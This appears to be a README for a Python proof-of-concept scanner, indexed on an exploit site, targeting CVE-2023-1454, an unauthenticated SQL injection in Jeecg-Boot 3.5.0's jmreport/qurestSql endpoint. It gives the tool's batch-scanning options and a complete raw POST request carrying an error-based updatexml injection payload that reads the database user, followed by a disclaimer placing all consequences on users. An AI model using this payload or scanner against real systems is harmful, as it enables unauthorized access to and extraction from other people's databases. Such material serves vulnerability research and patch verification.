Share
## https://sploitus.com/exploit?id=37CE7567-EF60-5382-A32D-51D2E11EC857
# CVE-2023-1454 Jeecg-Boot-qurestSql-SQLvuln
jmreport/qurestSql 未授权SQL注入批量扫描poc Jeecg-Boot是一款基于Spring Boot和Jeecg-Boot-Plus的快速开发平台,最新的jeecg-boot 3.5.0 中被爆出多个SQL注入漏洞。
## Usage
```
usage: CVE-2023-1454.py [-h] [-u URL] [-f FILE] [-t THREAD] [-T TIMEOUT] [-o OUTPUT] [-p PROXY]
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Target url(e.g. url.txt)
-f FILE, --file FILE Target file(e.g. url.txt)
-t THREAD, --thread THREAD
Number of thread (default 5)
-T TIMEOUT, --timeout TIMEOUT
Request timeout (default 3)
-o OUTPUT, --output OUTPUT
Vuln url output file (e.g. result.txt)
-p PROXY, --proxy PROXY
Request Proxy (e.g http://127.0.0.1:8080)
```
![](https://raw.githubusercontent.com/Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln/master/img/1.png)
poc:
```
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Content-Length: 128
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}
```
![](https://raw.githubusercontent.com/Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln/master/img/2.png)
## 免责声明
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,**均由使用者本人负责,作者不为此承担任何责任**。